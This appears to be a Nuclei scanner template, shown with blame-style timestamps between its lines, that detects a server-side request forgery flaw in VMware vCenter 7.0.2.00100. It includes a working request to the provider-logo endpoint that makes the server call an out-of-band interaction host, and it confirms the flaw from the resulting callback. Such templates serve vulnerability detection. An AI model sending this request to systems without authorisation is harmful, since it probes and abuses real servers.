2021-12-01 20:04:29 +00:00
id : vmware-vcenter-ssrf
info :
2022-06-03 19:12:31 +00:00
name : VMware vCenter - Server-Side Request Forgery/Local File Inclusion/Cross-Site Scripting
2021-12-01 20:04:29 +00:00
author : pdteam
severity : critical
2022-06-03 19:12:31 +00:00
description : VMware vCenter 7.0.2.00100 is susceptible to multiple vulnerabilities including server-side request forgery, local file inclusion, and cross-site scripting.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/l0ggg/VMware_vCenter
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : ssrf,lfi,xss,oast,vcenter,vmware
2021-12-01 20:04:29 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-01 20:04:29 +00:00
- method : GET
path :
2023-06-03 23:17:40 +00:00
- "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}"
2021-12-01 20:04:29 +00:00
matchers-condition : and
matchers :
2023-06-03 23:17:40 +00:00
- type : word
part : interactsh_protocol
words :
- "http"
2021-12-01 20:04:29 +00:00
2023-06-03 23:17:40 +00:00
- type : word
part : interactsh_request
words :
- "User-Agent: Java"
2023-10-20 11:41:13 +00:00
# digest: 4b0a00483046022100d5f12c18e01a09a213190d1851fc16971beb1798199b9833dba8aefb9e7a3a84022100abbd0732887781eea3db7d43d2003567b923483ae9d89dc87d7242bda1af3ce0:922c64590222798bb761d5b6d8e72950